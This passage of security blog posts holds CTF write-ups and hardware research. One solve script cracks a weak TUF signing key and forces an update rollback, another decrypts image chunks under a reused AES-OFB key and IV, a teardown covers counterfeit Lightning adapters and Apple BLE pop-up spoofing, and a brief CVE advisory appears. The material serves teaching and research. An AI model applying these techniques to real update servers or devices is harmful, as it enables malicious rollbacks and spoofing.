Thus, in order to convince the TUF client to download the old version of tcmupdate_v0.2.0.py from a TUF file server we control, we will need to insert the correct hash into targets.json. But if we do that, we will need to re-sign targets.json, then rebuild and re-sign snapshot.json, then rebuild and re-sign timestamp.json. None of this can be accomplished without the private signing key. This means that we need to crack the signing keys in order to rebuild updated TUF metadata. Luckily, inspecting the root.json file to learn about the keys indicates that the targets, snapshot, and timestamp roles all use the same RSA public-private keypair.
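Spotting the shared key by eye works, but it can also be checked mechanically. The sketch below groups roles by key ID using the `signed.roles.<role>.keyids` layout of TUF root metadata. The `sample_root` dictionary and its key IDs are hypothetical stand-ins for the real root.json, trimmed to the fields the function reads.

```python
from collections import defaultdict


def roles_by_keyid(root: dict) -> dict:
    """Map each key ID in a TUF root document to the roles that trust it."""
    grouped = defaultdict(list)
    for role, info in root["signed"]["roles"].items():
        for keyid in info["keyids"]:
            grouped[keyid].append(role)
    return dict(grouped)


# Hypothetical, trimmed-down metadata; real key IDs are long hex digests.
sample_root = {
    "signed": {
        "roles": {
            "root": {"keyids": ["root-key-id"], "threshold": 1},
            "targets": {"keyids": ["shared-key-id"], "threshold": 1},
            "snapshot": {"keyids": ["shared-key-id"], "threshold": 1},
            "timestamp": {"keyids": ["shared-key-id"], "threshold": 1},
        }
    }
}

if __name__ == "__main__":
    # For the real file: import json; sample_root = json.load(open("repository/root.json"))
    for keyid, roles in roles_by_keyid(sample_root).items():
        print(keyid, "->", ", ".join(sorted(roles)))
```

Any key ID that maps to several roles is a single point of failure: recovering that one private key is enough to re-sign every piece of metadata those roles cover.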

The key for this keypair is generated using weak RSA primes that are close to one another. This makes the key vulnerable to a Fermat factoring attack. The attack can either be performed manually using this technique, or can be performed automatically by a tool like RsaCtfTool.
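For reference, Fermat's method fits in a few lines. It searches for integers a and b with n = a² − b², which gives the factors (a − b) and (a + b); when the two primes are close together, a is only slightly above √n and the loop ends almost immediately. This is a minimal sketch with small illustrative numbers, not the challenge modulus, and the function name and step limit are our own choices.

```python
from math import isqrt


def fermat_factor(n: int, max_steps: int = 1_000_000) -> tuple:
    """Factor an odd n as (a - b) * (a + b); fast only when the factors are close."""
    a = isqrt(n)
    if a * a < n:
        a += 1  # start at ceil(sqrt(n))
    for _ in range(max_steps):
        b_squared = a * a - n
        b = isqrt(b_squared)
        if b * b == b_squared:
            return a - b, a + b
        a += 1
    raise ValueError("no factors found within max_steps; factors may not be close")


if __name__ == "__main__":
    # Illustrative values only: two nearby odd numbers standing in for weak RSA primes.
    p, q = 1000003, 1000033
    found_p, found_q = fermat_factor(p * q)
    print(found_p, found_q)

    # With the factors known, the private exponent follows from the public one.
    e = 65537
    phi = (found_p - 1) * (found_q - 1)
    d = pow(e, -1, phi)  # modular inverse, Python 3.8+
    print("e * d mod phi =", (e * d) % phi)
```

For a real key, the modulus and public exponent would first be read out of the PEM file, and the recovered values written back out as a private key, which is the part a tool like RsaCtfTool automates.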

After the key is cracked, we have to rebuild and re-sign all of the TUF metadata in sequence. This is most easily done using the go-tuf CLI from version v0.7.0 of the go-tuf library.

go install github.com/theupdateframework/go-tuf/cmd/tuf@v0.7.0

This CLI expects the keys to be in JSON format and stored in the keys subdirectory (sibling directory of the repository directory). A quick Python script will convert our public and private keys in PEM format into the expected JSON.

import base64
import json
import os
import sys

from nacl.secret import SecretBox
from cryptography.hazmat.primitives.kdf.scrypt import Scrypt

if len(sys.argv) < 3:
    sys.exit(f"{sys.argv[0]} <privkey> <pubkey>")

with open(sys.argv[1], "r") as f:
    private = f.read()
with open(sys.argv[2], "r") as f:
    public = f.read()

plaintext = json.dumps(
    [
        {
            "keytype": "rsa",
            "scheme": "rsassa-pss-sha256",
            "keyid_hash_algorithms": ["sha256", "sha512"],
            "keyval": {
                "private": private,
                "public": public,
            },
        },
    ]
).encode()

with open("/dev/urandom", "rb") as f:
    salt = f.read(32)
    nonce = f.read(24)

n = 65536
r = 8
p = 1
kdf = Scrypt(
    length=32,
    salt=salt,
    n=n,
    r=r,
    p=p,
)
secret_key = kdf.derive(b"redballoon")

box = SecretBox(secret_key)
ciphertext = box.encrypt(plaintext, nonce).ciphertext

print(
    json.dumps(
        {
            "encrypted": True,
            "data": {
                "kdf": {
                    "name": "scrypt",
                    "params": {
                        "N": n,
                        "r": r,
                        "p": p,
                    },
                    "salt": base64.b64encode(salt).decode(),
                },
                "cipher": {
                    "name": "nacl/secretbox",
                    "nonce": base64.b64encode(nonce).decode(),
                },
                "ciphertext": base64.b64encode(ciphertext).decode(),
            },
        },
        indent=2,
    )
)

Once we have converted all of the keys to the right format, we can run a sequence of TUF CLI commands to rebuild the metadata correctly with the cracked keys.

mkdir -p staged/targets
cp repository/targets/870cba60f57b8cbee2647241760d9a89f3c91dba2664467694d7f7e4e6ffaca588f8453302f196228b426df44c01524d5c5adeb2f82c37f51bb8c38e9b0cc900.tcmupdate_v0.2.0.py staged/targets/tcmupdate_v0.2.0.py
tuf add tcmupdate_v0.2.0.py
tuf snapshot
tuf timestamp
tuf commit

Then we run our own TUF HTTP fileserver, and point the challenge server at it to get the flag.

flag{Th15_challenge-Left_me-WE4k_in-the_$$KEYS$$}

The final solve script might look something like this:

#!/bin/bash

set -meuxo pipefail

tar -xvzf rbs-chv-ctf-2024.tar.gz
cd ctf

cat repository/root.json \
  | jq \
  | grep -i 'public key' \
  | sed 's/[^-]*\(-*BEGIN PUBLIC KEY-*.*-*END PUBLIC KEY-*\).*/\1/g' \
  | sed 's/\\n/\n/g' \
  > public.pem

python3 ~/Downloads/RsaCtfTool/RsaCtfTool.py --publickey public.pem --private --output private.pem

mkdir -p keys
python3 encode_key_json.py private.pem public.pem > keys/snapshot.json
cp keys/snapshot.json keys/targets.json
cp keys/snapshot.json keys/timestamp.json

mkdir -p staged/targets
cp repository/targets/870cba60f57b8cbee2647241760d9a89f3c91dba2664467694d7f7e4e6ffaca588f8453302f196228b426df44c01524d5c5adeb2f82c37f51bb8c38e9b0cc900.tcmupdate_v0.2.0.py staged/targets/tcmupdate_v0.2.0.py

tuf add tcmupdate_v0.2.0.py
tuf snapshot
tuf timestamp
tuf commit

python3 -m http.server --bind 0 --directory repository/ 8003 &
sleep 3

(
  echo 'tcmupdate_v0[^a]3'
  sleep 3
  echo 'http://172.28.2.169:8003'
  echo 'tcmupdate_v0.2.0.py'
) | nc 172.28.2.64 38002

kill %1

Conclusion

In addition to the CTF we brought to the DEF CON Car Hacking Village, we also set up a demonstration of our Symbiote host-based defense technology running on Rivian TCMs. These CTF challenges connect to that demo because the firmware rollbacks caused by exploiting the vulnerable CTF challenge application would (in a TCM protected by Symbiote) trigger alerts, and/or be blocked, depending on the customer’s desired configuration.

To reiterate, we hope that CTF participants enjoyed our challenges, and took away a few lessons:

- Even if TUF is used correctly, logic bugs outside of TUF can be exploited to violate its guarantees

- Even correct, reference implementations of TUF are vulnerable if the cryptographic keys used are weak

- Secure software updates are tricky

- There is no silver bullet in security; complementing secure software updates with on-device runtime attestation like Symbiote creates a layered, defense in depth strategy to ensure that attacks are thwarted

Red Balloon Security Identifies Critical Vulnerability in Kratos NGC-IDU

Introduction



Red Balloon Security Researchers discover and patch vulnerabilities regularly. One such recent discovery is CVE-2023-36670, which affects the Kratos NGC-IDU 9.1.0.4 system. Let’s dive into the details of this security issue.

Vulnerability Details

- CVE ID: CVE-2023-36670

- Description: A remotely exploitable command injection vulnerability was found on the Kratos NGC-IDU 9.1.0.4.

- Impact: An attacker can execute arbitrary Linux commands as root by sending crafted TCP requests to the device.

Kratos NGC-IDU 9.1.0.4

The Kratos NGC-IDU system is widely used in various industries, including telecommunications, defense, and critical infrastructure. It provides essential network management and monitoring capabilities. However, like any complex software, it is susceptible to security flaws.

Exploitation Scenario

- Crafted TCP Requests: An attacker sends specially crafted TCP requests to the vulnerable Kratos NGC-IDU device.

- Command Injection: Due to inadequate input validation, the attacker injects malicious commands into the system.

- Root Privileges: The injected commands execute with root privileges, granting the attacker full control over the device.

Mitigation

- Patch: Organizations using Kratos NGC-IDU 9.1.0.4 should apply the latest security updates promptly.

- Network Segmentation: Isolate critical devices from the public network to reduce exposure.

- Access Controls: Implement strict access controls to limit who can communicate with the device.

- Monitoring: Monitor network traffic for suspicious activity.

Conclusion

In modern infrastructure, devices such as the Kratos NGC-IDU are at the intersection of incredible value and escalating threat. Despite functionality that is often mission critical and performance that is highly visible, these devices can be insufficiently protected, making them an inviting target. CVE-2023-36670 highlights the importance of timely patching and robust security practices. Organizations must stay vigilant, continuously assess their systems, and take proactive measures to protect against vulnerabilities.

At Red Balloon, we solve the device vulnerability gap by building security from the inside out, putting customers’ strongest line of defense at their most critical point. Red Balloon’s embedded security solutions enable customers to solve the device vulnerability gap where the greatest damage can happen and the least security exists.

For more information, refer to the official CVE-2023-36670 entry, or contact Red Balloon Security.

Hacking In-Vehicle Infotainment Systems with OFRAK 3.2.0 at DEF CON 31

Two weeks ago, Red Balloon Security attended DEF CON 31 in Las Vegas, Nevada. In addition to sponsoring and partnering with the Car Hacking Village, where we showed off some of our latest creations, we contributed two challenges to the Car Hacking Village Capture the Flag (CTF) competition. This competition was a “black badge CTF” at DEF CON, which means the winners are granted free entrance to DEF CON for life.

Since it’s been a little while since DEF CON ended, we figured we’d share a write-up of how we would go about solving the challenges. Alternatively, here is a link to an OFRAK Project (new feature since OFRAK 3.2.0!) that includes an interactive walkthrough of the challenge solves.

Challenge 1: Inside Vehicle Infotainment (IVI)

Description: Find the flag inside the firmware, but don’t get tricked by the conn man, etc.

CTF participants start off with a mysterious, 800MB binary called ivi.bin. The description hints that the file is firmware of some sort, but doesn’t give much more info than that. IVI is an acronym for “In Vehicle Infotainment,” so we expect that the firmware will need to support a device with a graphical display and some sort of application runtime, but it is not yet clear that that info will be helpful.



To begin digging into the challenge, the first thing we do is to unpack the file with OFRAK. Then, we load the unpacked result in the GUI for further exploration.

# Install OFRAK
python3 -m pip install ofrak ofrak_capstone ofrak_angr

# Unpack with OFRAK and open the unpacked firmware in the GUI
ofrak unpack --gui --backend angr ./ivi.bin



When the GUI opens, we see that the outermost layer that has been unpacked is a GZIP. By selecting the only child of the GZIP in the resource tree, and then running “Identify,” we can see that OFRAK has determined that the decompressed file is firmware in Intel Hex format.

Luckily, OFRAK has an Intel Hex unpacker built-in, so we can unpack this file to keep digging for the flag.

OFRAK unpacks the Ihex into an IhexProgram. At this point, we’re not sure if what we’re looking at is actually a program, or is a file that can unpack further. Looking at the metadata from OFRAK analysis in the bottom left pane of the GUI, we note that the file has only one, large segment. This suggests that it is not a program, but rather some other file packed up in IHEX format.



If we run “Identify” on the unpacked IhexProgram, OFRAK confirms that the “program” is actually GZIP compressed data.



To gather more information, we can make OFRAK run Binwalk analysis. This will happen automatically when clicking the “Analyze” button, or we can use the “Run Component” button to run the Binwalk analyzer manually.

Binwalk tends to have a lot of false positives, but in this case, it confirms that this resource is probably a GZIP. Since we know this, we can use the “Run Component” interface to run the GzipUnpacker and see what is inside.

Running “Identify” on the decompressed resource shows that there was a TAR archive inside. Since OFRAK can handle this easily, we click “Unpack” on the TAR. Inside of the archive, there are three files:

- qemu.sh

- bzImage

- agl-ivi-demo-platform-html5-qemux86-64.ext4

The first file is a script to emulate the IVI system inside QEMU. The second file is the kernel for the IVI system. And the third file is the filesystem for the IVI.

Based on the bzImage kernel, the flags for QEMU in the script, and the EXT4 filesystem format, we can assume that the IVI firmware is Linux-based. Moreover, we can guess that AGL in the filename stands for “Automotive Grade Linux,” which is a big hint about what type of Linux applications we’ll encounter when we delve deeper.

Since the description talks about “conn man” and “etc,” we have a hint that it makes sense to look for the flag in the filesystem, instead of the kernel.



OFRAK has no problem with EXT filesystems, so we can select that resource and hit “Unpack” to explore this firmware further.

From here, there are two good paths to proceed. The easiest one is to use OFRAK’s new search feature to look for files containing the string flag{, which is the prefix for flags in this competition.

The second is to notice that in the hint, it mentions etc and connman, both of which are folders inside the AGL filesystem.



Navigating into the /etc/connman folder, we see a file called flag1.txt. Viewing this gives us the first flag!

flag{unp4ck_b33p_b00p_pack}
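The string search described above can also be approximated outside the GUI once the filesystem has been extracted to disk. The sketch below is plain Python and does not use the OFRAK API; the function name `find_files_containing` and the example directory path in the comment are assumptions for illustration.

```python
import os


def find_files_containing(root: str, needle: bytes = b"flag{"):
    """Yield paths of regular files under root whose raw bytes contain needle."""
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            # Skip symlinks so links pointing outside the extracted tree are ignored.
            if os.path.islink(path) or not os.path.isfile(path):
                continue
            try:
                with open(path, "rb") as f:
                    # Reads the whole file at once; fine for a sketch, not for huge files.
                    if needle in f.read():
                        yield path
            except OSError:
                continue


# Example usage (the directory name is hypothetical):
# for hit in find_files_containing("./extracted_ext4"):
#     print(hit)
```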

Challenge 2: Initialization Vector Infotainment (IVI)

Description: IVe heard there is a flag in the mechanic area, but you can’t decrypt it without a password… Right?

The hint provided with the challenge download makes it clear that this second challenge is in the same unpacked firmware as the first one. As such, the natural first step is to go looking for the “mechanic area” to find the flag.



One option is to use the qemu.sh script to try and emulate the IVI. Then it might become apparent what the description means by “mechanic area.” However, this is not necessary if you know that “apps” for Automotive Grade Linux are stored in /usr/wam_apps/<app name> in the filesystem.

Navigating directly to that directory, we can see that there is an app called html5-mecharea. One subdirectory of that folder is called chunks, and contains many files with the name flag.XXX.png. This is a pretty good hint that we’re on the right track.

The only problem is that if we try to view any of those PNG files, they appear corrupted.





Poking around the folder a bit more, we see two useful files: create.go, and app/src/App.svelte. It looks like create.go was used to break an image with the flag into chunks, and then encrypt them separately. App.svelte is responsible for taking a password from a user, and using that to try and decrypt the chunks into a viewable image.

create.go seems to be a Golang program to generate a (truly) random password string, use PBKDF2 to generate an AES key from the password, generate a truly random IV, break an image into 1024-byte chunks, encrypt each chunk with AES in OFB mode using the same key and IV, and then dump the encrypted chunks to disk.

Similarly, App.svelte does the inverse process: get a passphrase from a user, do PBKDF2 key derivation, load chunks of an image and try to decrypt them, then concatenate and display the decrypted result.

Looking at these two source files, it’s not apparent that the implementation of randomness or the crypto functions themselves are unsafe. Instead, the most eyebrow-raising aspect (as hinted by the challenge description and title) is the reuse of the same key and Initialization Vector for every chunk of plaintext.

In the OFB mode of AES, the key and IV are the inputs to the AES block cipher, and the output is chained into the next block. Then all of the blocks are used as the source of randomness for a one-time pad. Specifically, they are XORed with the plaintext to get the ciphertext. In other words, the same key and IV generate the same “randomness,” which is then XORed with each plaintext chunk to make a ciphertext chunk.

One fun feature of the XOR function is that any value is its own inverse under XOR. The XOR function is also commutative and associative. This means that the following is true if rand_1 == rand_2, which they will be because the same key and IV generate the same randomness:

cipher_1 XOR cipher_2 == (plain_1 XOR rand_1) XOR (plain_2 XOR rand_2)

== (plain_1 XOR plain_2) XOR (rand_1 XOR rand_2)

== (plain_1 XOR plain_2) XOR 0000000 ... 0000000

== plain_1 XOR plain_2

To reiterate: the reuse of the same key and IV tells us that the rand_N values will be the same for all of the ciphertexts. This means that the result of XORing any two ciphertexts together (when the same key and IV are used in OFB mode) is the two plaintexts XORed together.

Luckily, based on a closer inspection of the source, one of the chunks is saved unencrypted in the chunks folder. This is used in the code for determining if the passphrase is correct, and that the beginning of the image was successfully decrypted. But we can use it to XOR out the resulting parts of the plaintext. Therefore, we are able to do the following for every ciphertext chunk number N to eventually get back all of the plain text:

plain_1 XOR cipher_1 XOR cipher_N == plain_1 XOR (plain_1 XOR plain_N)

(by above reasoning)

== (plain_1 XOR plain_1) XOR plain_N

== 00000000 ... 00000000 XOR plain_N

== plain_N
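The identity above can be checked with a few lines of Python before touching the real chunks. This is only a sketch: random bytes from `os.urandom` stand in for the AES-OFB keystream, and the two 16-byte plaintexts are made-up values rather than data from the challenge.

```python
import os


def xor(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings, truncating to the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))


def recover_chunk(plain_1: bytes, cipher_1: bytes, cipher_n: bytes) -> bytes:
    """Compute plain_1 XOR cipher_1 XOR cipher_N, which equals plain_N."""
    return xor(xor(plain_1, cipher_1), cipher_n)


# Stand-in for the keystream produced by one fixed key and IV (assumption).
keystream = os.urandom(16)

plain_1 = b"\x89PNG\r\n\x1a\n" + b"header!!"  # known chunk (made up)
plain_n = b"flag chunk data!"                 # unknown chunk (made up)

cipher_1 = xor(plain_1, keystream)
cipher_n = xor(plain_n, keystream)

print(recover_chunk(plain_1, cipher_1, cipher_n) == plain_n)
```

Note that the keystream never has to be recovered explicitly; knowing a single plaintext chunk is enough to cancel it out of every other chunk.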

The last step is to write a little code to do this for us. A simple solution in Golang is included below, but it should be straightforward to do the same in your favorite programming language.

package main

import (
	"crypto/aes"
	"crypto/subtle"
	"os"
	"sort"
)

func main() {
	outfile, _ := os.Create("outfile.png")

	os.Chdir("chunks")
	chunkdir, _ := os.Open(".")
	filenames, _ := chunkdir.Readdirnames(0)
	sort.Strings(filenames)

	var lastEncrypted []byte = nil
	lastDecrypted, _ := os.ReadFile("flag.unencrypted.png")

	for _, filename := range filenames {
		if filename == "flag.unencrypted.png" {
			continue
		}

		data, _ := os.ReadFile(filename)
		encryptedData := data[aes.BlockSize:]
		xorData := make([]byte, len(encryptedData))

		if lastEncrypted != nil {
			outfile.Write(lastDecrypted)
			subtle.XORBytes(xorData, encryptedData, lastEncrypted)
			subtle.XORBytes(lastDecrypted, lastDecrypted, xorData)
		}

		lastEncrypted = encryptedData
	}

	outfile.Write(lastDecrypted)
	outfile.Close()
}



When we do this and concatenate all of the plaintexts in the right order, we get a valid PNG image that contains the flag.

flag{cr4sh_syst3ms_n0t_c4rs}

Brief Tour of OFRAK 3.2.0

In the meantime, we published OFRAK 3.2.0 to PyPI on August 10!

As always, a detailed list of changes can be viewed in the OFRAK Changelog.

We’ve had several new features and quality of life improvements since our last major release.

Projects

OFRAK 3.2.0 introduces OFRAK Projects. Projects are collections of OFRAK scripts and binaries that help users organize, save, and share their OFRAK work. Accessible from the main OFRAK start page, Projects let users create, continue, or clone an OFRAK project with ease. With an OFRAK Project you can run scripts on startup, easily access them from the OFRAK Resource interface, and link them to their relevant binaries. Open our example project to get started, and then share your projects with the world. We can’t wait to see what you make!

Search Bars

OFRAK 3.2.0 also introduces a long-awaited feature: search bars. Two new search bars are available in the OFRAK Resource interface, one in the Resource Tree pane, and one in the Hex View pane. Each search bar allows the user to search for exact, case-insensitive, or regular expression strings and bytes. The Resource Tree search bar will filter the tree for resources containing the search query, while the Hex View search bar will scroll to and iterate over the instances of the query. The resource search functionality is also available in the Python API using resource.search_data.

Additional Changes

- Journalling Flash File System (JFFS) packing/repacking support.

- Intel Hex (ihex) packing/repacking support (useful for our Car Hacking Village DEF CON challenges).

- EXT versions 2 – 4 packing/repacking support.

Learn More at OFRAK.COM


Baets by Der

Friendly advice from Red Balloon Security: Just pay the extra $2

Recently, we wanted to use some wired headphones with an iPhone, which sadly lacks a headphone jack. The nearest deli offered a solution: a Lightning-to-headphone jack adapter for only $7. Got to love your local New York City bodega.

But a wrinkle appeared: Plugging in the adapter made the phone pop up a dialog to pair with a BeatsX device, which changed to “Baets” once a Bluetooth connection was established. Shouldn’t this thing be a simple digital-to-analog converter? Why is Bluetooth involved? What makes the iPhone think it’s from Beats? That’s too many questions to ignore: We had to dig into this unexpected embedded device.

And here’s the short-take of our analysis: Beware the transposed vowels. “Baets” is not what it would want you to believe it is.

Once connected, the headphones work as if directly plugged into the phone. But we found that Bluetooth must remain on to keep listening, and the phone insists it is connected to a Bluetooth device, called “Baets.” We also noticed the phone’s battery draining much faster than usual.

This mysterious behavior piqued our interest. Red Balloon specializes in embedded security and reverse engineering, so interest gave way to action. We promptly bought a dozen more of the same adapter model to tear down and study.


MFi is MIA

The first thing we noted is none of these adapters had the Apple Made for iPhone/iPad (MFi) chip you’ll find in genuine, approved accessories and cables. Apple licenses that chip to control who is allowed to produce Lightning devices. Instead, each of these knock-off adapters draws power from the Apple device to power its own Bluetooth module. The module then broadcasts that it is ready to pair with the Apple device, though in fact any nearby device can now pair with it and play audio.

Presumably, using Bluetooth is cheaper than licensing Apple’s chip, which is why the knockoffs cost $2 less than the genuine Apple version.

This initial finding fueled two research objectives: 1) To discover how the adapter convinced the Apple device to power the module; and 2) to discover how the adapter displayed the pop-up window.

How does it receive power?



We encountered three different hardware configurations on these devices; they appear to have many similarities, but it’s unclear if the same manufacturer makes them. One of the variations does not work: It doesn’t appear to power up, generates no pop-ups, and has no Bluetooth Classic connection. But this variation successfully draws power from the Apple device, so the failure is likely in the circuit or Bluetooth chip.

Overall, the hardware is not very complex and lacks components seen in a genuine adapter, including protection circuitry.















First working counterfeit: Lightning to headphone jack





Second working counterfeit: Lightning to headphone jack





Third counterfeit: Lightning to headphone jack (non-functional)





Legitimate Apple adapter. Credit: iFixit





On the active adapters, one side of the PCB holds the Bluetooth chip and antenna. On the other side is a crystal oscillator clock, which connects to the Bluetooth chip. The chip connects to the accessory power (ACC_PWR) pin of the Lightning connector but does not automatically receive power. The final chip negotiates with the Apple device to draw power through the Lightning port. This negotiation chip is vital to enabling power for the Bluetooth module.

Lightning Connector pinout according to patent filing:

https://web.archive.org/web/20190801205452/http://ramtin-amin.fr/tristar.html

In Lightning connectors, the pins on each side of the connector do not mirror each other, so the control chip must identify the orientation of the connector before proceeding. In addition, the Lightning connector has a dynamic pinout controlled by the Lightning port control chip in the Apple device, which negotiates with a security chip in the cable. (Nyan Satan’s research into the Lightning port provides a good baseline for understanding the communication between any accessory and the Apple device.)

The female Lightning port control chip is codenamed Hydra (a newer version that replaced the chip codenamed Tristar), and has the label CBTL1614A1 on the iPhone 12, according to a teardown by iFixit, which identifies it as a multiplexer. Apple guards details on these chips, but some data sheets have leaked in the past, revealing some expected functions. HiFive is the codename of the security chip in the cable, labeled as SN2025 or BQ2025 in male connectors. These chips are only available to MFi-certified manufacturers, and only Apple knows their internal behavior, which is intended to prevent counterfeits. We will focus on the HiFive chip, since we found replica versions in our Baets adapters.

The HiFive chip identifies the cable and negotiates for power through the Texas Instruments SDQ protocol, where Apple’s specific implementation is referred to as IDBUS. Our research utilized the SDQAnalyzer plugin for the Saleae Logic Analyzer. The negotiations include identifying information from the accessory and the Apple device. Still, every individual accessory contains unique information that makes it difficult to reverse engineer and counterfeit without being detected.

Replicating the communication of a single, legitimate Apple accessory is enough to draw power. This means that every knockoff chip from the same model identifies itself as the same individual accessory or cable to the Apple device (with the same serial number or unique data as the single cloned cable’s HiFive chip). As a result, an iOS update can block this handshake and break all the devices using the same knockoff chip that shares a single serial number. This may explain why some cheap charging cables and accessories mysteriously stop working or produce error/unlicensed warnings when plugged in. The owner of the legitimate cloned cable may also be out of luck, but the impact would be limited to that individual.













In 2016, electronupdate decapped an earlier version of these third-party chips and revealed a much simpler die than you’ll find in the legitimate TI BQ2025 chip used in authentic lightning cables.

Decapped third-party chip

http://electronupdate.blogspot.com/2016/09/3rd-party-apple-lightning.html

Authentic TI BQ2025 chip decapped

Credit: 9to5mac.com

Many chips advertise the ability to negotiate power through the Lightning port. Knockoff manufacturers continue to create many variations as old versions stop working. One of our Baets devices uses an unknown chip labeled “24..” The others use the MT821B and 821B, which all share the same accessory serial number. Online posts referencing other variations of uncertified power negotiating chips include the CY262, AD139, and ASB260, to name a few. It’s unknown if any of these chips or adapters come from the same manufacturers.

Each chip receives the 2.65V signal from the ACC_ID line and outputs 1.9V to one of the data lines.

The constant high signal on the data line is not needed for the negotiation (removing it has no effect there), but it is necessary for keeping power to the device when the screen is off. Setting the data line consistently high at 1.9V turns on the screen. Some of our adapters do not support sending over the data line in both orientations, so the Bluetooth module turns off when the Apple device turns its screen off and stops supplying power.

Communication is half-duplex bidirectional, using the SDQ protocol. Like the 1-Wire protocol, the host and adapter communicate over the ACC_ID line only. The female Lightning port repeatedly sends requests for connected accessories to identify themselves. It alternates the pins of the request to determine the accessory orientation.



After receiving the request, the chip must first identify itself with the Hydra chip. In this proprietary protocol, if the first byte is even, it is a request, and the request ID + 1 is the response code. The initial request for identification has ID 0x74 and the response is Request ID + 1 (0x75). Not all the types of requests are known, but a list of known commands has been created by @spbdimka.

Incomplete List of IDBUS Request Types

https://twitter.com/spbdimka/status/1118597972760125440
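The request/response convention described above (an even first byte marks a request, and the response code is the request ID plus one) can be sketched as a small helper for annotating a logic analyzer capture. The function names and the sample trace below are assumptions for illustration; only the 0x74/0x75 pairing and the 0x76 request come from our observations, and the payload encoding is not modeled.

```python
def is_request(first_byte: int) -> bool:
    """An even first byte marks a request under the convention described above."""
    return first_byte % 2 == 0


def expected_response(request_id: int) -> int:
    """Return the response code for a request ID (request ID + 1)."""
    if not is_request(request_id):
        raise ValueError(f"0x{request_id:02X} is not a request ID")
    return (request_id + 1) & 0xFF


def pair_messages(first_bytes):
    """Pair each request with the message after it when that message has the matching code."""
    pairs = []
    i = 0
    while i < len(first_bytes):
        code = first_bytes[i]
        if (
            is_request(code)
            and i + 1 < len(first_bytes)
            and first_bytes[i + 1] == expected_response(code)
        ):
            pairs.append((code, first_bytes[i + 1]))
            i += 2
        else:
            # Unanswered request or stray response: record it without a partner.
            pairs.append((code, None))
            i += 1
    return pairs


# Hypothetical sequence of first bytes taken from a capture.
trace = [0x74, 0x75, 0x76, 0x77]
for request, response in pair_messages(trace):
    print(f"request 0x{request:02X} -> response {response}")
```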



We observed many of these codes during our investigation. Others are not listed explicitly by @spbdimka, but can be inferred since each response is just an incremented code of the request. The encoding of the data is unknown, but we can get a general idea of the process necessary to request power from the device. The adapter responds to these requests with incremented response codes, as expected. The negotiation from that adapter is shown below:

After the 0x76 request receives a response, the ACC_PWR line goes high at either 3.3V or 4.1V. If the output is 4.1V, it will eventually correct down to 3.3V.





This powers on the Bluetooth module, which will result in the pop-up window appearing on the device, prompting the user to connect. The ID of the adapter that is responding is 0x11F000000000. While it matches the same pattern of other accessories and cables, it does not match authentic Lightning to headphone jack adapters that have ID 0x04F100000000. The Baets adapters do not use the legitimate identifier, likely due to the fact that legitimate adapters directly convert audio signals and need more functionality than the knock-off versions, which only need to draw 3.3V from the accessory power line.

The Module and Accessory Serial Numbers are sent in plain ASCII format, but it is unknown if they correspond to the same accessory. The messages include additional information for an unknown purpose.

The last two commands are the Apple Device’s Model Number and Software Version in ASCII with the following format:

Changing the device and the iOS version we used to test resulted in different values for the Model Number and Software Version, as would be expected.





How does it activate the pop-up window?



Other research, including Handoff All Your Privacy and Discontinued Privacy, has highlighted Apple’s use of Bluetooth Low Energy (BLE) to enable Continuity features such as AirDrop, AirPrint, and Handoff. It is also used for Proximity Pairing with AirPods and other Bluetooth headphones made by Apple. We found that it was possible to duplicate the behavior to show the prompt on any nearby Apple devices. Pressing ‘Connect’ will pair with a Bluetooth device of our choosing while it’s posing as any model of Apple wireless headphones.

Pop-Up Window to connect AirPods

When Bluetooth is on, Apple devices send and receive BLE messages in the background. New research from the Technical University of Darmstadt in Germany highlights that these BLE advertisements continue when iPhones are turned off. These messages are receivable by any nearby BLE devices, even if they are intended for communication with paired devices. iPhones and iPads are the most active, constantly advertising their status, including whether they are locked, unlocked, driving, playing music, watching a video, and making or receiving a call. Bluetooth headphones (e.g., AirPods, Beats) also advertise their status and battery level. Apple Watches use BLE to communicate their connectivity to a paired iPhone.





Apple devices freely advertise a lot of other data over the air using BLE. BLE advertising packets are well documented, and many popular devices and phones use them in ways similar to the Apple Continuity protocols. Apple’s format is known from prior research:

Structure of a BLE advertisement packet

Celosia, G., & Cunche, M. (2020)





The Manufacturer Specific Data includes the length of the data, the Apple company identifier (0x004C), and then the Continuity Message that is different for each respective Continuity protocol. We focused on the Continuity Message for the Proximity Pairing feature for this research. It has been previously documented as having only this format:

Proximity Pairing (AirPods)

Celosia, G., & Cunche, M. (2020)
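To make the layout of the Manufacturer Specific Data concrete, here is a minimal Python sketch that walks the standard BLE advertising structures (a length byte, a type byte, then data) and pulls out Apple's payload by its company identifier. Treating the Continuity payload as a sequence of type/length/value messages follows the prior research cited above and is an assumption here; the sample bytes are synthetic, not a capture from our adapters.

```python
APPLE_COMPANY_ID = 0x004C
AD_TYPE_MANUFACTURER = 0xFF  # "Manufacturer Specific Data" AD type


def iter_ad_structures(adv: bytes):
    """Yield (ad_type, data) for each length-prefixed structure in an advertisement."""
    i = 0
    while i < len(adv):
        length = adv[i]
        # The length byte counts the type byte plus the data bytes.
        if length == 0 or i + 1 + length > len(adv):
            break
        yield adv[i + 1], adv[i + 2 : i + 1 + length]
        i += 1 + length


def apple_continuity_messages(adv: bytes):
    """Return (message_type, payload) tuples found in Apple manufacturer data."""
    messages = []
    for ad_type, data in iter_ad_structures(adv):
        if ad_type != AD_TYPE_MANUFACTURER or len(data) < 2:
            continue
        # The company identifier is transmitted little-endian (0x4C 0x00).
        if int.from_bytes(data[:2], "little") != APPLE_COMPANY_ID:
            continue
        body = data[2:]
        j = 0
        while j + 2 <= len(body):
            msg_type, msg_len = body[j], body[j + 1]
            messages.append((msg_type, body[j + 2 : j + 2 + msg_len]))
            j += 2 + msg_len
    return messages


# Synthetic advertisement: a flags structure, then Apple manufacturer data
# carrying one message with a three-byte placeholder payload.
sample = bytes.fromhex("020106" "08ff4c00" "0703aabbcc")
print(apple_continuity_messages(sample))
```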

However, when another device receives this advertisement from very close range, it recognizes that it is near someone else’s AirPods and alerts the user.





We found that an additional format is implemented for headphones ready to pair with a new device. This mode is denoted by setting the third byte to 0x00. The format is shown below with an example of data we observed from the adapters:

Advertising data from Baets Adapter:





